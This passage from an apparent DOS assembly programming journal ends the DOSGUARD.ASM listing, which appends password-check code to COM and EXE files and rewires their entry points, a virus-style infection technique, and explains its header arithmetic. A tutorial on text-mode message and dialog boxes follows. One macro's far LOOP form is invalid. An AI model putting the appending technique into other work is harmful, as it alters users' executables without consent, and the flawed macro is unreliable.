         xor     cx, cx                  ;Set counter to zero
         cld                             ;Tell cmpsb to increment si and di

CHECKLOOP:
         cmpsb                           ;Compare passwd with guess
         jne     FAIL                    ;Abort program if password is wrong
         inc     cx                      ;Increment counter
         cmp     cx, 8                   ;Only check first 8 chars
         jne     CHECKLOOP               ;Loop until you've read first 8

SUCCESS:
         mov     cx, 5
         cld
         lea     si, [bp + obytes]
         mov     di, 100h
         rep     movsb
         push    100h                    ;return from the jump to execute
         ret                             ;the host program

FAIL:
         mov     ah, 9h                  ;DOS print string
         lea     dx, [bp + badpass]      ;Print bad password msg
         int     21h
         mov     ax, 4C00h
         int     21h

prompt  DB      'password: ','$'
badpass DB      'Invalid password!','$'
passwd  DB      'smcrocks'
guess   DB      10 dup (0)
obytes  DB      0,0,0,0,0

ENDGUARD:


;-------------------------------------------------------------------------
;Code to add to EXE files
;-------------------------------------------------------------------------
EXEGUARD:
         push    ax                      ;Save startup value in ax
         push    ds                      ;Save value of ds
         mov     ax, cs                  ;Put cs into ds and es
         mov     ds, ax
         mov     es, ax
         mov     bp, offset ENDGUARD2 - offset EXEGUARD
         mov     ax, [bp-4]

         mov     ah, 9h                  ;DOS print string
         lea     dx, [bp-57]             ;Print the password prompt
         int     21h
         lea     di, [bp-20]
         xor     cx, cx

EREADLOOP:
         mov     ah, 7h                  ;Read without echo
         int     21h
         inc     cx                      ;Count of characters entered
         stosb                           ;Store guess for comparison later
         cmp     cx, 10                  ;Limit guess to 10 chars incl. CR
         je      ECHECKPASS
         cmp     al, 13                  ;Quit loop when CR read
         jne     EREADLOOP

ECHECKPASS:
         lea     di, [bp-20]             ;Setup for passwd checking loop
         lea     si, [bp-28]             ;Setup addresses for cmpsb
         xor     cx, cx                  ;Set counter to zero
         cld                             ;Tell cmpsb to increment si and di

ECHECKLOOP:
         cmpsb                           ;Compare passwd with guess
         jne     EFAIL                   ;Abort program if password is wrong
         inc     cx                      ;Increment counter
         cmp     cx, 8                   ;Only check first 8 chars
         jne     ECHECKLOOP              ;Loop until you've read first 8

ESUCCESS:
         pop     ds
         mov     ax, ds
         mov     es, ax
         pop     ax

         cli
         mov     ss, word ptr cs:[bp-10]
         mov     sp, word ptr cs:[bp-8]
         sti

         xor     cx, cx
         xor     dx, dx
         xor     bp, bp
         xor     si, si
         xor     di, di
         lahf
         xor     ah, ah
         sahf


         jmp     dword ptr cs:[ENDGUARD2-EXEGUARD-6]


EFAIL:
         mov     ah, 9h                  ;DOS print string
         lea     dx, [bp-46]             ;Print bad password msg
         int     21h
         mov     ax, 4C00h
         int     21h

eprompt DB      'password: ','$'
ebadpass DB     'Invalid password!','$'
epasswd DB      'smcrocks'
eguess  DB      10 dup (0)
hosts   DW      0, 0
hostc   DW      0, 0
delta   DW      0

ENDGUARD2:


filter1 DB      '*.com',0
filter2 DB      '*.exe',0
bytes   DB      0,0,0,'CG'
exehead DB      28 dup (0)
buffer  DB      512 dup (0)
para    DB      16 dup (0)
lps     DW      0

END START
---------------------------END DOSGUARD.ASM------------------------------------
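
The size arithmetic in INFECT_EXE is easier to follow with concrete numbers.
The Python sketch below (an illustration only, not part of DOSGUARD) mirrors
three calculations from the listing: rounding the file length up to a
paragraph boundary, deriving the module's initial CS, and computing the page
count and last-page size written to the header.  The function names and the
sample values (a 1000-byte file, a 32-paragraph header, a 300-byte module)
are assumptions made up for the example.

```python
PARAGRAPH = 16   # bytes per paragraph
PAGE = 512       # bytes per EXE page


def round_up_like_listing(size):
    """Mirror 'or dl, 0Fh / add dx, 1 / adc cx, 0'.

    The result is the next multiple of 16 strictly above size | 0Fh, so a
    size that is already paragraph-aligned still grows by 16 bytes.
    """
    return (size | 0x0F) + 1


def module_segment(aligned_size, header_paragraphs):
    """Initial CS (and SS) of the appended module: file size / 16 - header size."""
    return aligned_size // PARAGRAPH - header_paragraphs


def size_fields_like_listing(aligned_size, module_len):
    """Return (page count, last page size) the way the listing computes them."""
    return divmod(aligned_size + module_len + PAGE, PAGE)


aligned = round_up_like_listing(1000)
print(aligned, module_segment(aligned, 32), size_fields_like_listing(aligned, 300))
```

With these sample values the appended module starts at byte 1008 of the file,
which is paragraph 63; subtracting the 32 header paragraphs gives an initial
CS of 31.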



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                              Creating a User-Friendly Interface
                                              by S Sirajudeen


     Nowadays, a programmer in any language has to build user-friendly
features into commercial software, because users expect software to be easy
to use. For example, Windows is the most popular OS largely because of its
Graphical User Interface.

      For an assembly language programmer developing a DOS-based program,
incorporating even a few basic features of a graphical interface like that
of Windows is tedious and challenging.

      Sometimes, in assembly language, developing the core of a program
takes far less time than writing the code for its user interface. For
instance, assume that we're writing an addition program which displays a
dialog box to input two numbers and displays the result in a dialog box.
Here, the dialog box is the user interface. What this program has to do is:
      * Display a dialog box.
      * Receive the numbers to be added as strings.
      * Check whether the strings contain letters or graphics characters.
        If so, prompt the user to reenter the numbers.
      * Convert the ASCII digits into binary form.
      * Perform binary multibyte addition.
      * Convert the binary sum into ASCII digits.
      * Display the sum in a dialog box.
Our goal is only to add two numbers, yet we have to spend more time on the
user interface than on the addition itself.
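
      To make the non-display steps concrete, here is a minimal sketch of
the validate / convert / add / convert-back sequence. It is written in Python
rather than assembly purely so that it is short and easy to check; the
function names are invented for this illustration, and Python's integers
stand in for the multibyte arithmetic an assembly version would need.

```python
def is_all_digits(text):
    """True only for a non-empty string of ASCII digits '0'..'9'."""
    return len(text) > 0 and all("0" <= ch <= "9" for ch in text)


def ascii_to_binary(text):
    """Convert ASCII digits to an integer, one digit at a time."""
    value = 0
    for ch in text:
        value = value * 10 + (ord(ch) - ord("0"))
    return value


def binary_to_ascii(value):
    """Convert a non-negative integer to ASCII digits by repeated division."""
    if value == 0:
        return "0"
    digits = []
    while value > 0:
        value, remainder = divmod(value, 10)
        digits.append(chr(ord("0") + remainder))
    return "".join(reversed(digits))


def add_numbers(first, second):
    """Return the sum as a digit string, or None if an input must be re-entered."""
    if not (is_all_digits(first) and is_all_digits(second)):
        return None
    return binary_to_ascii(ascii_to_binary(first) + ascii_to_binary(second))


print(add_numbers("123", "877"))
print(add_numbers("12a", "1"))
```

Even in this compact form, the addition itself is a single "+"; everything
else is input checking and conversion.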

      Hearing all this, you may become frustrated and decide to skip user
interface design. Still, when developing utilities or packages for commercial
purposes, a programmer has to do these things to accommodate users. This
is why I present this article.

      This article focuses on user-friendly features in DOS text mode.
In DOS text mode, user-friendly features include menus, message boxes,
dialog boxes, list boxes, text windows, radio buttons, status bars, mouse
support, etc.

      In this article, I will cover only an About message box and a dialog
box. However, knowledge of interrupts (for screen and mouse handling) is
essential, even for a C/C++ programmer, to incorporate user-friendly features
in a DOS-based program.

GETTING STARTED:
    Before going on, a few things must be made clear.

i) Text can be displayed in one of the following ways:
          1) Direct access to video memory
          2) Using INT 21h
          3) Using INT 10h
     In the examples in this article, I have used function 0Eh of INT 10h
     to display text.

ii)  To keep the example programs straightforward, I have used |, -
     and + as the box characters in the dialog box, since the actual box
     characters are EXTENDED ASCII characters, which are not allowed in a
     text article.

       The content of the dialog box is labeled DIALOG_BOX_TEXT.

       Before assembling this program, PLEASE REPLACE the characters |, -
    and + in the content of the dialog box with the BOX CHARACTERS listed
    below.

    --------------------------------------
     ASCII code      Description
    --------------------------------------
       179           Vertical bar
       196           Horizontal bar
       218           Upper left corner
       191           Upper right corner
       192           Lower left corner
       217           Lower right corner
    --------------------------------------
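
The replacement can also be done mechanically. The following Python sketch
(an illustration, not something from the original program) converts a plain
rectangular box drawn with |, - and + into the codes from the table. The
function name to_box_characters is made up, and only the four outer corners
are handled because the table lists no junction characters.

```python
# Code page 437 values from the table above.
VERTICAL, HORIZONTAL = 179, 196
UPPER_LEFT, UPPER_RIGHT = 218, 191
LOWER_LEFT, LOWER_RIGHT = 192, 217

CORNERS = {
    (True, True): UPPER_LEFT,
    (True, False): UPPER_RIGHT,
    (False, True): LOWER_LEFT,
    (False, False): LOWER_RIGHT,
}


def to_box_characters(rows):
    """Replace |, - and + in a plain rectangular box with box-drawing bytes.

    Every | and - is replaced, so text inside the box should avoid them.
    A '+' that is not one of the four outer corners is left unchanged.
    """
    last_row = len(rows) - 1
    converted = []
    for r, row in enumerate(rows):
        out = bytearray(row.encode("ascii"))
        last_col = len(row) - 1
        for c, ch in enumerate(row):
            if ch == "|":
                out[c] = VERTICAL
            elif ch == "-":
                out[c] = HORIZONTAL
            elif ch == "+" and r in (0, last_row) and c in (0, last_col):
                out[c] = CORNERS[(r == 0, c == 0)]
        converted.append(bytes(out))
    return converted


box = to_box_characters(["+--+", "|Hi|", "+--+"])
for line in box:
    print(list(line))
```

Each resulting byte string can be pasted into a db statement as a list of
numeric values if the editor cannot store extended characters directly.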

EXAMPLE 1:
      First of all, we're going to put a zooming message box in our program.
It serves as an introduction to the second example.

     You may have seen that some utilities, such as Norton Utilities, display
a zooming message box to alert users.

     What this program does is:
        - n boxes of different sizes are displayed one after another,
          each for a fixed delay. Each box is larger than the previous
          one, so the box appears to zoom.

          LOGIC:
             Displaying a box larger than the previously displayed box
          amounts to enlarging/zooming the previous box.
               i) Zoom box by n rows
              ii) Zoom box by n columns
             iii) Zoom box n times

        - It displays horizontal and vertical shadows for the box
        - Finally, it displays text within the box

     What you will learn:
        i) Screen handling using BIOS interrupt 10h
       ii) The groundwork for the second example.
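
     The zoom logic can be sketched in a few lines. The Python fragment
below is only an illustration of the coordinate arithmetic; the starting box
(row 8, columns 37 to 39), the step sizes (1 row, 5 columns per side) and the
count of 8 are the values MSGBOX.ASM appears to use, while the function name
zoom_steps is made up.

```python
def zoom_steps(top, left, bottom, right, steps, row_step=1, col_step=5):
    """Yield (top, left, bottom, right) for each box, smallest first."""
    for _ in range(steps):
        yield (top, left, bottom, right)
        top -= row_step      # grow upward
        left -= col_step     # grow to the left
        bottom += row_step   # grow downward
        right += col_step    # grow to the right


# Starting box and step count as read from MSGBOX.ASM.
boxes = list(zoom_steps(8, 37, 8, 39, steps=8))
for box in boxes:
    print(box)
```

Drawing these rectangles in order, with a short pause after each, produces
the zooming effect; the last one spans rows 1 to 15 and columns 2 to 74 of
the 25 x 80 screen.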

Below is the source code of our simple program.
;; +------------------------------------------------------------------------+
;; | Program   : MSGBOX.ASM                                                 |
;; | Purpose   : Demonstration program about Message Box                    |
;; | Assembler : TASM                                                       |
;; +------------------------------------------------------------------------+

;; MACROS in this program    : @SetTextMode, @Cursor, @Display, @Window,
;;                             @Delay
;; PROCEDURES in this program: Message_box, Window
;;///////////////////////////////////////////////////////////////////////;;
.386
MODEL USE16 TINY     ;; @Always must be TINY model

;;///////////////////////////////////////////////////////////////////////;;
DATASEG              ;; Initialize variables

RED    EQU 4fh       ;; @Color values
BLACK  EQU 0fh
BLUE   EQU 1fh

screen                EQU BLUE
shadow_colour         EQU BLACK
box_background_colour EQU RED

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
nl EQU  0Dh,0Ah
label dialog_box_text
db nl
db nl,'      +-------------------------+--------------------------------------+'
db nl,'      | ::/ \::::::.            |  Program to Display a Message Box    |'
db nl,'      | :/___\:::::::.          |                                      |'
db nl,'      | /|    \::::::::.        |     Written  By  S.SIRAJUDEEN.       |'
db nl,'      | :|   _/\:::::::::.      |   E-Mail: ssirajudeen@...            |'
db nl,'      | :| _|\  \::::::::::.    |                                      |'
db nl,'      | :::\_____\::::::::::.   |       Published in ASMJOURNAL        |'
db nl,'      | ::::::::::::::::::::::. | Internet: asmjournal.freeservers.com |'
db nl,'      |      AsmJournal         |                                      |'
db nl,'      +-------------------------+--------------------------------------+'
db nl,'      |  # If you have any comments or suggestions then please email me|'
db nl,'      |    at ssirajudeen@...                                          |'
db nl,'      +----------------------------------------------------------------+'
db nl,nl,nl,nl
count dw $-offset dialog_box_text

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
upper_x equ 08       ;; Upper left corner of the box to be zoomed
upper_y equ 37

lower_x equ 08       ;; Lower right corner of the box to be zoomed
lower_y equ 39

left_x db upper_x    ;; Variables to hold the UPPER LEFT coordinates of the
left_y db upper_y    ;; next box to be displayed

right_x db lower_x   ;; Variables to hold the LOWER RIGHT coordinates of the
right_y db lower_y   ;; next box to be displayed

shadow_vertical_left_x    db upper_x+1 ;; Don't Change!
shadow_vertical_left_y    db lower_y+1 ;; Coordinates to display the VERTICAL
shadow_vertical_right_x   db lower_x+1 ;; shadow of message box.
shadow_vertical_right_y   db lower_y+2

shadow_horizontal_left_x  db lower_x+1 ;; Don't Change!
shadow_horizontal_left_y  db upper_y+2 ;; Coordinates to display the HORIZONTAL
shadow_horizontal_right_x db lower_x+1 ;; shadow of message box
shadow_horizontal_right_y db lower_y+2

;;//////////////////////////////////////////////////////////////////////;;
UDATASEG
         DW 100H DUP (?)
MyStack LABEL WORD

;;--------------------------<  @SetTextMode  >------------------------;;
@SetTextMode MACRO
              mov ax,0003h
              int 10h
              ENDM  ;;End of macro

;;----------------------------<  @Cursor  >---------------------------;;
;;PURPOSE : Macro to move cursor
;;SYNTAX  : @Cursor <row>, <col>

@Cursor MACRO ROW,COL
         mov ah,02
         mov bh,00
         mov dh,ROW
         mov dl,COL
         int 10h
         ENDM    ;;End of macro

;;----------------------------<  @Display  >---------------------------;;
;;PURPOSE:   Macro to display a text
;;SYNTAX :   @DISPLAY <text width>, <text address>

@Display MACRO xcount, address
         LOCAL display_text
         mov cx, xcount          ;; Number of characters to be displayed
         mov bx, offset address
display_text:
         mov ah,0Eh              ;; Display the text
         mov al,byte ptr [bx]
         push bx
         mov bh,00
         mov bl,07h
         int 10h

         pop bx
         inc bx                  ;; Point to next character
         loop far ptr cs:display_text
         ENDM    ;;End of macro

;;-----------------------------<  @Window  >----------------------------;;
;;PURPOSE : Macro to display a window with a given color as background
;;SYNTAX  : @window <background color>,
;;                  <Upper left row of user window>, <Upper left column>,
;;                  <Lower right row of user window>, <Lower right column>

@window MACRO  color, lrow, lcol, rrow, rcol
         mov ah,06
         mov al,00
         mov bh, color     ;; Background Color
         mov ch, lrow
         mov cl, lcol
         mov dh, rrow
         mov dl, rcol
         int 10h
         ENDM    ;;End of macro

;;-----------------------------<  @Delay  >-----------------------------;;
@delay  MACRO
         mov ah,86h       ;; Execute a time delay
         mov dx,4500h ;;9000
         mov cx,0000h
         int 15h
         ENDM    ;;End of macro

;;/////////////////////////  MAIN PROGRAM  /////////////////////////////;;
CODESEG                  ;; This marks the start of executable code
         STARTUPCODE

         mov sp,offset MyStack
         push cs          ;; Initialize segment registers.
         pop ds
         push cs
         pop ss

         mov ah,0Bh       ;; Display screen border in WHITE color
         mov bx,0007h
         int 10h

         call message_box ;; Display the message box

         mov ax,4C00h     ;; Terminate the program.
         int 21h

;;////////////////////////////  Message_box  ///////////////////////////;;
Message_box PROC
         @SetTextMode
         @cursor 00,00                  ;; Position cursor at 00,00.
         @window screen,00,00,24,79     ;; @Clear screen

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
         mov cx,0008h  ;; Don't change!  Calculate how many times to zoom.
zoom:
         push cx       ;; @@Display a window which is zooming.
         call window
         pop cx

         loop zoom

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
         @display count, dialog_box_text

         ret
Message_box ENDP

;;///////////////////////////   Window   ///////////////////////////////;;
Window  PROC
   ;;Display a window with the box background colour (RED).
        @window box_background_colour, left_x, left_y, right_x, right_y

        dec byte ptr left_x
        sub cl,5
        mov byte ptr left_y,cl

        inc byte ptr right_x
        add dl,5
        mov byte ptr right_y,dl

;;---------------------------------------------------------------------;;
   ;;Display a vertical shadow.
        @window shadow_colour,shadow_vertical_left_x,shadow_vertical_left_y,shadow_vertical_right_x,shadow_vertical_right_y

        dec byte ptr shadow_vertical_left_x
        add cl,5
        mov  byte ptr shadow_vertical_left_y,cl

        inc byte ptr shadow_vertical_right_x
        add dl,5
        mov  byte ptr shadow_vertical_right_y,dl

;;--------------------------------------------------------------------;;
   ;;Display a horizontal shadow.
        @window shadow_colour,shadow_horizontal_left_x,shadow_horizontal_left_y,
                shadow_horizontal_right_x,shadow_horizontal_right_y

        inc byte ptr shadow_horizontal_left_x
        sub cl,5
        mov byte ptr shadow_horizontal_left_y,cl

        inc byte ptr shadow_horizontal_right_x
        add dl,5
        mov byte ptr shadow_horizontal_right_y,dl

;;--------------------------------------------------------------------;;
        @delay

        ret
Window ENDP

END
;;////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\;;

EXAMPLE 2:
     Well, next we're going to put a DIALOG BOX in our program.

     What it does is:
        - Displays a dialog box with YES and NO buttons
        - Supports button selection using the mouse
             (i) Checks whether a mouse driver is installed
            (ii) Shows the mouse pointer
           (iii) Captures clicks of the left mouse button
        - Checks for keyboard input
           (i) Checks whether an EXTENDED key was pressed
          (ii) Checks whether the ENTER or TAB key was pressed
        - Toggles the button selection on pressing TAB, LEFT ARROW or RIGHT
          ARROW.
        - On pressing ENTER or clicking the YES or NO button, displays a
          message that depends on the selected button and terminates.

     What we will learn from this example is:
        (i) Mouse handling
       (ii) Screen handling using BIOS interrupt 10h
      (iii) Keyboard handling using BIOS interrupt 16h
       (iv) Idea of user interface design

     I made the following program very straightforward and ignored code
optimization to reduce complexity.
;; +-------------------------------------------------------------------------+
;; | Program   : DLGBOX.ASM                                                  |
;; | Purpose   : Demonstration program about Dialog Box with YES & NO button|
;; | Features  : Supports mouse for button selection                         |
;; | Assembler : TASM                                                        |
;; | Required Knowledge: INT 21h, INT 10h, INT 16h, INT 33h & Scan Code      |
;; +-------------------------------------------------------------------------+

;; MACROS in this program    : @Cursor, @Display, @window, @Yes  & @No
;; PROCEDURES in this program: Dialog_box
;;///////////////////////////////////////////////////////////////////////;;
.386
MODEL USE16 TINY     ;; @Always must be TINY model

;;///////////////////////////////////////////////////////////////////////;;
DATASEG              ;; Initialize variables

mouse db 'n'         ;; Flag to indicate the availability of mouse

mouse_x db 0         ;; Keep track of position of mouse cursor
mouse_y db 0

m_x dw 00
m_y dw 00

left_mouse_button db 0   ;; Flag updated on clicking the left mouse button

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
RED    EQU 4fh       ;; @Color values
CYAN   EQU 3fh
BLACK  EQU 0fh
BLUE   EQU 1fh
WHITE  EQU 7fh

box_height EQU 10
box_width EQU 46

left_x EQU 7      ;; Upper left corner of user window
left_y EQU 20

right_x EQU left_x+box_height-1 ;; Calculate lower right corner of user window
right_y EQU left_y+box_width-1

upper_left_row db left_x
upper_left_col db left_y

box_background_color EQU RED ; Background color of dialog box

nl EQU  0Dh,0Ah   ; New line


label dialog_box_text
db '+--------------- USER COMMENT ---------------+' ;Dialog box. The variable
db '|                                            |' ;dialog_box_text contains
db '|         Written By S.Sirajudeen            |' ;10 lines; width of each
db '|      E-mail: ssirajudeen@...      |' ;line is 46 characters.
db '|                                            |'
db '|       HAVE YOU ENJOYED THIS PROGRAM?       |' ;NOTE:
db '|                                            |' ;If you edit here, you
db '|              Yes #       No  #             |' ;should UPDATE the
db '|            #######     #######             |' ;text_width and
db '+--------------------------------------------+' ;text_line_count.
count dw $-offset dialog_box_text

text_line_count EQU 10    ;; Variable dialog_box_text contains 10 lines
text_width      EQU 46    ;; and width of each line is 46 characters

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
shadow EQU WHITE              ;; color of button shadow

;;NOTE:  Width of 'yes' and 'yes_button' should be the same.
yes_button      db 17,' Yes ',16  ;; Displayed when the YES button is selected
yes             db '  Yes  '
yes_horz_shadow db 7 dup(223)
yes_char_count EQU 7

;;NOTE:  Width of 'no' and 'no_button' should be the same.
no_button      db 17,'  No ',16   ;; Displayed when the NO button is selected
no             db '   No  '
no_horz_shadow db  7 dup(223)
no_char_count  EQU 7

vert_shadow    db 220

yes_x EQU right_x-2           ;; Row and column where the YES button is displayed
yes_y EQU left_y+(box_width/2)-yes_char_count-4 ;;32

no_x  EQU right_x-2           ;; Row and column where the NO button is displayed
no_y  EQU left_y+(box_width/2)+1 ;;44

select   EQU BLUE   ;; @Background color to highlight the button selection
unselect EQU BLACK

button db 'y' ;; @Flag to keep track of the button selection. If the value
               ;; is 'y', the YES button is selected; 'n' for the NO button.

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
label thank_you      ;; Message displayed when the YES button was chosen
db 07,'                        Written By S.SIRAJUDEEN',nl
db '4/55,L.M.BUILDING,KUMARESAPURAM,KUTHAPAR(PO),TRICHY-620013,TAMILNADU,INDIA'
db nl,'                      Email: ssirajudeen@...'
db nl,nl,'                            Thank you! Good-bye!!'
thank_you_count dw $-thank_you

label suggest        ;; Message displayed when the NO button was chosen
db 7h,'        If you have any comments or suggestions, then please mail me at'
db nl,'                               ssirajudeen@...'
db nl
suggest_count dw $-suggest

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
;;  -------------+-----------  INT 21h function 08h returns one byte per
;; |Extended Keys| Scan Code | call. Alphanumeric keys, Tab, Space, Enter
;; |-------------+-----------| and Escape return a single byte, their ASCII
;; | Left Arrow  |    75     | code. EXTENDED keys return two bytes: the
;; | Right Arrow |    77     | first is always 0, the second is the key's
;; | Up Arrow    |    72     | SCAN CODE. The arrow keys, Home, End,
;; | Down Arrow  |    80     | Page Up, Page Down, Insert, Delete and the
;;  -------------+-----------  function keys are EXTENDED keys.
LEFT_ARROW  equ 75  ;; Scan code of LEFT ARROW key is 75
RIGHT_ARROW equ 77  ;;      ,,      RIGHT ARROW key is 77
TAB_KEY     equ 9   ;; ASCII code of TAB key is 9
ENTER_KEY   equ 13  ;;      ,,       ENTER key is 13

;;//////////////////////////////////////////////////////////////////////;;
UDATASEG
         DW 50H DUP (?)
MyStack LABEL WORD

;;----------------------------<  @Cursor  >---------------------------;;
;;PURPOSE : Macro to move cursor
;;SYNTAX  : @Cursor <row>, <col>

@Cursor MACRO ROW,COL
         mov ah,02
         mov bh,00
         mov dh,ROW
         mov dl,COL
         int 10h
         ENDM    ;;End of macro

;;----------------------------<  @Display  >---------------------------;;
;;PURPOSE:   Macro to display a text
;;SYNTAX :   @DISPLAY <text width>, <text address>

@Display MACRO xcount, address
         LOCAL display_text
         mov cx, xcount          ;; Number of characters to be displayed
         mov bx, offset address
display_text:
         mov ah,0Eh              ;; Display the text
         mov al,byte ptr [bx]
         push bx
         mov bh,00
         mov bl,07h
         int 10h

         pop bx
         inc bx                  ;; Point to next character
         loop display_text       ;; LOOP only has a short (8-bit) form
         ENDM    ;;End of macro

;;----------------------------<  @window  >-----------------------------;;
;;PURPOSE : Macro to display a window with a given color as background
;;SYNTAX  : @window <background color>,
;;                  <Upper left row of user window>, <Upper left column>,
;;                  <Lower right row of user window>, <Lower right column>

@window MACRO  color, lrow,lcol, rrow, rcol
         mov ah,06
         mov al,00
         mov bh, color  ;;Background Color
         mov ch, lrow
         mov cl, lcol
         mov dh, rrow
         mov dl, rcol
         int 10h
         ENDM    ;;End of macro

;;------------------------<  @button_shadow  >--------------------------;;
;;PURPOSE : Macro to pad the buttons with horizontal and vertical shadow
;;          characters so that they look like 3D buttons.
@button_shadow MACRO
    @Cursor yes_x+1, yes_y+1        ;; Display horizontal shadow of YES button
    @Display yes_char_count, yes_horz_shadow

    @Cursor yes_x, yes_y+yes_char_count ;; Display vertical shadow
    @Display 1, vert_shadow

    @Cursor no_x+1, no_y+1          ;; Display horizontal shadow of NO button
    @Display no_char_count, no_horz_shadow

    @Cursor no_x, no_y+no_char_count    ;; Display vertical shadow
    @Display 1, vert_shadow

    ENDM

;;-----------------------------<  @Yes  >-------------------------------;;
;;PURPOSE : Macro to select the YES button.
;;          In other words, a window which is used as YES button is displayed

@Yes  MACRO
     mov button, 'y'                 ;; DON'T CHANGE! ;  Update flag
     @window select, yes_x, yes_y, yes_x, yes_y+(yes_char_count-1)
     @window unselect, no_x, no_y, no_x, no_y+(no_char_count-1)

     @Cursor yes_x,yes_y                 ;; Move cursor to YES button
     @Display yes_char_count,yes_button  ;; Display label of YES
     @Cursor no_x,no_y                   ;; Move cursor to NO button
     @Display no_char_count, no          ;; Display label of NO button

     ENDM    ;;End of macro

;;-----------------------------<  @No  >--------------------------------;;
;;PURPOSE : Macro to select the NO button
;;          In other words, a window which is used as NO button is displayed

@No  MACRO
     mov button, 'n'                  ;; DON'T CHANGE! ;  Update flag
     @window unselect,yes_x, yes_y, yes_x, yes_y+(yes_char_count-1)
     @window select, no_x, no_y, no_x, no_y+(no_char_count-1)

     @Cursor yes_x,yes_y
     @Display yes_char_count, yes
     @Cursor no_x,no_y
     @Display no_char_count, no_button

     ENDM    ;;End of macro

;;////////////////////////  MAIN PROGRAM   /////////////////////////////;;
CODESEG                   ;;This marks the start of executable code
         STARTUPCODE

         mov sp,offset MyStack
         push cs           ;;Initialize segment registers.
         pop ds
         push cs
         pop ss

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
         @window BLACK, 00, 00, 24, 79     ;;@Clear screen

         call Dialog_box   ;;Display the dialog box

display_thank_u:
         cmp button,'y'    ;; Check whether YES button was pressed/clicked
         jne display_suggestion

         @Display thank_you_count, thank_you
         jmp _end

display_suggestion:       ;; NO button was pressed/clicked
         @Display suggest_count, suggest

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_end:
         mov ax,4C00h       ;; Terminate the program.
         int 21h

;;///////////////////////////   Dialog_box   ////////////////////////////;;
Dialog_box PROC
      mov ax,0003 ;; Don't change! Set text mode 3. A different mode has a
      int 10h     ;; different resolution, and mouse movement is converted
                  ;; into rows and columns based on the resolution of the
                  ;; text mode.

      mov ax,00   ;; Reset mouse
      int 33h

      cmp ax,00   ;; AX=0 means that no mouse driver is installed
      je start

      mov ax,01   ;; Show mouse pointer
      int 33h

      mov mouse, 'y'

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
start:
      @window box_background_color,left_x,left_y,right_x,right_y ;;Display a BOX

      @Cursor left_x,left_y  ;; Move cursor to upper left corner of dialog box

      mov cx, text_line_count           ;; Display n lines as dialog box text
      mov bx, offset dialog_box_text    ;; Address of text
next_line:
      push bx                           ;; OUTER LOOP
      push cx

            mov cx,00                   ;; INNER LOOP
            mov cl, text_width
display_text:
            mov ah,0Eh                  ;; Display the text
            mov al,byte ptr [bx]
            push bx
            mov bh,00
            mov bl,07h
            int 10h

            pop bx
            inc bx
            loop display_text           ;; INNER LOOP

      pop cx
      pop bx

      mov dx,00               ;; Calculate address of next line
      mov dl, text_width
      add bx, dx

      inc byte ptr upper_left_row

      push bx
      @Cursor upper_left_row, upper_left_col ;; Move cursor to next line
      pop bx                                 ;; within dialog box
      loop next_line                         ;; OUTER LOOP

      @button_shadow

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_yes:
      @Yes             ;; Select the YES button

      cmp left_mouse_button,01
      je _end_proc

      jmp mouse_check

_no:
      @No              ;;Select  the NO button

      cmp left_mouse_button,01
      je _end_proc

mouse_check:
      cmp mouse, 'y'  ;; Check whether mouse is available
      jne key_check

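      mov ax,03       ;; Get mouse position and button status:
      int 33h         ;; BX = buttons, CX = horizontal, DX = vertical position

      mov left_mouse_button,bl

      mov word ptr m_x,dx   ;; m_x holds the vertical position (row)
      mov word ptr m_y,cx   ;; m_y holds the horizontal position (column)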

mouse_button:
      and left_mouse_button, 01 ;; Check whether left mouse button is pressed

      cmp left_mouse_button, 01
      jne key_check

mouse_row:
      mov mouse_x,0         ;; Mouse position is converted into rows and
                            ;; columns to locate the mouse cursor
      cmp word ptr m_x,00
      je mouse_col

      mov ax,word ptr m_x   ;; In text mode 3, divide the VERTICAL position
      mov bl,8              ;; by 8 to calculate the current ROW.
      div bl

      mov mouse_x, al

mouse_col:
      mov  mouse_y,0
      cmp word ptr m_y,00
      je key_check

      mov ax, word ptr m_y  ;; In text mode 3, divide the HORIZONTAL position
      mov bl,8              ;; by 8 to calculate the current COLUMN.
      div bl

      mov mouse_y, al

mouse_yes:
      mov al, mouse_x
      cmp al, yes_x      ;; Check whether mouse has clicked anywhere on
      jne  mouse_no      ;; the row where YES button is displayed

      mov al, mouse_y

      cmp al, yes_y
      jb mouse_no

      cmp al, yes_y+(yes_char_count-1)
      ja mouse_no

      mov button, 'y'
      jmp _yes

mouse_no:
      mov al, mouse_x
      cmp al, no_x       ;; Check whether mouse has clicked anywhere on
      jne  key_check     ;; the row where NO button is displayed

      mov al, mouse_y

      cmp al, no_y
      jb key_check

      cmp al, no_y+(no_char_count-1)
      ja key_check

      mov button, 'n'
      jmp _no

key_check:
      mov ah,01           ;; @Check whether any character is in keyboard buffer
      int 16h
      jz mouse_check
      mov ah,08           ;; @Receive character without echoing to screen
      int 21h

      cmp al, TAB_KEY     ;; Check whether TAB key was pressed
      je _left

      cmp al,ENTER_KEY    ;; Check whether ENTER key was pressed.
      je _end_proc        ;; Exit program

      cmp al,00           ;; @Check whether an Extended Key was pressed.
      jne mouse_check
      mov ah,08           ;; The second read returns the scan code
      int 21h

      cmp al, LEFT_ARROW  ;; Check whether LEFT ARROW key was pressed
      je _left

      cmp al, RIGHT_ARROW ;; Check whether RIGHT ARROW key was pressed
      je _right

      jmp  mouse_check

;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;
_left:
      cmp button,'y'
      je _no
      jmp _yes

_right:
      cmp button,'y'
      je _no
      jmp _yes

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_end_proc:

      @Cursor right_x+1, 0    ;; Move cursor below the dialog box

